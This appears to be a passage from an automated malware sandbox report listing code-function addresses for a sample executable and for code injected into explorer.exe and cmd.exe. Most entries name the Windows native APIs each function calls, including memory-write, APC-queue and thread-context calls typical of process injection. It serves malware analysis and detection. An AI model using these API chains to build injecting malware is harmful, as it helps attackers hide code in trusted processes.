          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12B80 NtQueryInformationFile,4_2_03C12B80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BA0 NtEnumerateValueKey,4_2_03C12BA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AF0 NtWriteFile,4_2_03C12AF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AB0 NtWaitForSingleObject,4_2_03C12AB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F90 NtProtectVirtualMemory,4_2_03C12F90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FA0 NtQuerySection,4_2_03C12FA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FB0 NtResumeThread,4_2_03C12FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F60 NtCreateProcessEx,4_2_03C12F60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12EE0 NtQueueApcThread,4_2_03C12EE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12E80 NtReadVirtualMemory,4_2_03C12E80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12E30 NtWriteVirtualMemory,4_2_03C12E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DB0 NtEnumerateKey,4_2_03C12DB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D00 NtSetInformationFile,4_2_03C12D00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D30 NtUnmapViewOfSection,4_2_03C12D30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CC0 NtQueryVirtualMemory,4_2_03C12CC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CF0 NtOpenProcess,4_2_03C12CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C00 NtQueryInformationProcess,4_2_03C12C00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13090 NtSetValueKey,4_2_03C13090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13010 NtOpenDirectoryObject,4_2_03C13010
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C139B0 NtGetContextThread,4_2_03C139B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13D70 NtOpenThread,4_2_03C13D70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13D10 NtOpenProcessToken,4_2_03C13D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A3D0 NtReadFile,4_2_02F7A3D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A320 NtCreateFile,4_2_02F7A320
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A450 NtClose,4_2_02F7A450
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A44B NtClose,4_2_02F7A44B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_03AB9BAF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,4_2_03ABA036
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_03AB9BB2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABA042 NtQueryInformationProcess,4_2_03ABA042
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,4_2_00244C10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00249458 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,4_2_00249458
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D088880_2_07D08888
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D000400_2_07D00040
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D056500_2_07D05650
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D034A00_2_07D034A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D02C300_2_07D02C30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D038D80_2_07D038D8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D0305B0_2_07D0305B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D030680_2_07D03068
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 0_2_07D000070_2_07D00007
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D9042_2_0041D904
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041DBD72_2_0041DBD7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041E5412_2_0041E541
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041D5662_2_0041D566
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041E7A92_2_0041E7A9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018141A22_2_018141A2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E81582_2_017E8158
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018201AA2_2_018201AA
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018181CC2_2_018181CC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FA1182_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017501002_2_01750100
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F20002_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018203E62_2_018203E6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F02_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181A3522_2_0181A352
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E02C02_2_017E02C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018002742_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018205912_2_01820591
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017605352_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180E4F62_2_0180E4F6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018044202_2_01804420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018124462_2_01812446
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017607702_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017847502_2_01784750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175C7C02_2_0175C7C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177C6E02_2_0177C6E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017769622_2_01776962
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182A9A62_2_0182A9A6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A02_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017628402_2_01762840
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176A8402_2_0176A840
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E8F02_2_0178E8F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017468B82_2_017468B8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01816BD72_2_01816BD7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181AB402_2_0181AB40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175EA802_2_0175EA80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FCD1F2_2_017FCD1F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176AD002_2_0176AD00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175ADE02_2_0175ADE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01778DBF2_2_01778DBF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800CB52_2_01800CB5
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760C002_2_01760C00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750CF22_2_01750CF2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D4F402_2_017D4F40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01780F302_2_01780F30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A2F282_2_017A2F28
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01802F302_2_01802F30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752FC82_2_01752FC8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DEFA02_2_017DEFA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181CE932_2_0181CE93
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760E592_2_01760E59
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181EEDB2_2_0181EEDB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181EE262_2_0181EE26
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772E902_2_01772E90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174F1722_2_0174F172
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0179516C2_2_0179516C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176B1B02_2_0176B1B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182B16B2_2_0182B16B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180F0CC2_2_0180F0CC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181F0E02_2_0181F0E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018170E92_2_018170E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017670C02_2_017670C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174D34C2_2_0174D34C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181132D2_2_0181132D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A739A2_2_017A739A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018012ED2_2_018012ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177D2F02_2_0177D2F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177B2C02_2_0177B2C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017652A02_2_017652A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FD5B02_2_017FD5B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018175712_2_01817571
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017514602_2_01751460
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181F43F2_2_0181F43F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181F7B02_2_0181F7B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A56302_2_017A5630
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018116CC2_2_018116CC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017699502_2_01769950
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177B9502_2_0177B950
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F59102_2_017F5910
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CD8002_2_017CD800
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017638E02_2_017638E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0179DBF92_2_0179DBF9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D5BF02_2_017D5BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181FB762_2_0181FB76
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177FB802_2_0177FB80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D3A6C2_2_017D3A6C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01801AA32_2_01801AA3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180DAC62_2_0180DAC6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01817A462_2_01817A46
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181FA492_2_0181FA49
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FDAAC2_2_017FDAAC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A5AA02_2_017A5AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01763D402_2_01763D40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177FDC02_2_0177FDC0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01811D5A2_2_01811D5A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01817D732_2_01817D73
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D9C322_2_017D9C32
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181FCF22_2_0181FCF2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181FFB12_2_0181FFB1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181FF092_2_0181FF09
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01761F922_2_01761F92
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01769EB02_2_01769EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAF7B323_2_0FAF7B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAF7B303_2_0FAF7B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAFD2323_2_0FAFD232
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB005CD3_2_0FB005CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAF4D023_2_0FAF4D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAFA9123_2_0FAFA912
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAF30823_2_0FAF3082
          Source: C:\Windows\explorer.exeCode function: 3_2_0FAFC0363_2_0FAFC036
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC32323_2_10DC3232
          Source: C:\Windows\explorer.exeCode function: 3_2_10DB90823_2_10DB9082
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC20363_2_10DC2036
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC65CD3_2_10DC65CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC09123_2_10DC0912
          Source: C:\Windows\explorer.exeCode function: 3_2_10DBAD023_2_10DBAD02
          Source: C:\Windows\explorer.exeCode function: 3_2_10DBDB323_2_10DBDB32
          Source: C:\Windows\explorer.exeCode function: 3_2_10DBDB303_2_10DBDB30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0024540A4_2_0024540A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244C104_2_00244C10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002548754_2_00254875
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002474B14_2_002474B1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002491444_2_00249144
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026695A4_2_0026695A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002641914_2_00264191
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00247A344_2_00247A34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0024EE034_2_0024EE03
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00263E664_2_00263E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0024D6604_2_0024D660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00246E574_2_00246E57
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00253EB34_2_00253EB3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00255A864_2_00255A86
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026769E4_2_0026769E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254EC14_2_00254EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00246B204_2_00246B20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002507404_2_00250740
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00250BF04_2_00250BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03CA03E64_2_03CA03E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BEE3F04_2_03BEE3F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9A3524_2_03C9A352
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C602C04_2_03C602C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C802744_2_03C80274
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C981CC4_2_03C981CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03CA01AA4_2_03CA01AA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C681584_2_03C68158
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BD01004_2_03BD0100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C7A1184_2_03C7A118
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C720004_2_03C72000
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BDC7C04_2_03BDC7C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C047504_2_03C04750
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE07704_2_03BE0770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFC6E04_2_03BFC6E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03CA05914_2_03CA0591
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE05354_2_03BE0535
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C8E4F64_2_03C8E4F6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C924464_2_03C92446
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C844204_2_03C84420
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C96BD74_2_03C96BD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9AB404_2_03C9AB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BDEA804_2_03BDEA80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE29A04_2_03BE29A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03CAA9A64_2_03CAA9A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BF69624_2_03BF6962
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BC68B84_2_03BC68B8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C0E8F04_2_03C0E8F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BEA8404_2_03BEA840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE28404_2_03BE2840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C5EFA04_2_03C5EFA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BD2FC84_2_03BD2FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C54F404_2_03C54F40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C22F284_2_03C22F28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C00F304_2_03C00F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C82F304_2_03C82F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9EEDB4_2_03C9EEDB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BF2E904_2_03BF2E90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9CE934_2_03C9CE93
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE0E594_2_03BE0E59
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9EE264_2_03C9EE26
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BF8DBF4_2_03BF8DBF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BDADE04_2_03BDADE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BEAD004_2_03BEAD00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C7CD1F4_2_03C7CD1F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BD0CF24_2_03BD0CF2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C80CB54_2_03C80CB5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE0C004_2_03BE0C00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C2739A4_2_03C2739A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9132D4_2_03C9132D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BCD34C4_2_03BCD34C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE52A04_2_03BE52A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C812ED4_2_03C812ED
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFD2F04_2_03BFD2F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFB2C04_2_03BFB2C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BEB1B04_2_03BEB1B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03CAB16B4_2_03CAB16B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C1516C4_2_03C1516C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BCF1724_2_03BCF172
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C8F0CC4_2_03C8F0CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C970E94_2_03C970E9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9F0E04_2_03C9F0E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE70C04_2_03BE70C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9F7B04_2_03C9F7B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C916CC4_2_03C916CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C7D5B04_2_03C7D5B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C975714_2_03C97571
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BD14604_2_03BD1460
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9F43F4_2_03C9F43F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C55BF04_2_03C55BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C1DBF94_2_03C1DBF9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFFB804_2_03BFFB80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9FB764_2_03C9FB76
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C8DAC64_2_03C8DAC6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C25AA04_2_03C25AA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C7DAAC4_2_03C7DAAC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C81AA34_2_03C81AA3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9FA494_2_03C9FA49
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C97A464_2_03C97A46
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C53A6C4_2_03C53A6C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C759104_2_03C75910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE99504_2_03BE9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFB9504_2_03BFB950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE38E04_2_03BE38E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C4D8004_2_03C4D800
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE1F924_2_03BE1F92
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9FFB14_2_03C9FFB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9FF094_2_03C9FF09
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE9EB04_2_03BE9EB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BFFDC04_2_03BFFDC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C91D5A4_2_03C91D5A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C97D734_2_03C97D73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03BE3D404_2_03BE3D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C9FCF24_2_03C9FCF2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C59C324_2_03C59C32
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7E7A94_2_02F7E7A9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D5664_2_02F7D566
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7E5414_2_02F7E541
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7D9044_2_02F7D904
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F69E504_2_02F69E50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F69E4B4_2_02F69E4B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F62FB04_2_02F62FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F62D904_2_02F62D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABA0364_2_03ABA036
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB5B324_2_03AB5B32
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB5B304_2_03AB5B30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABB2324_2_03ABB232
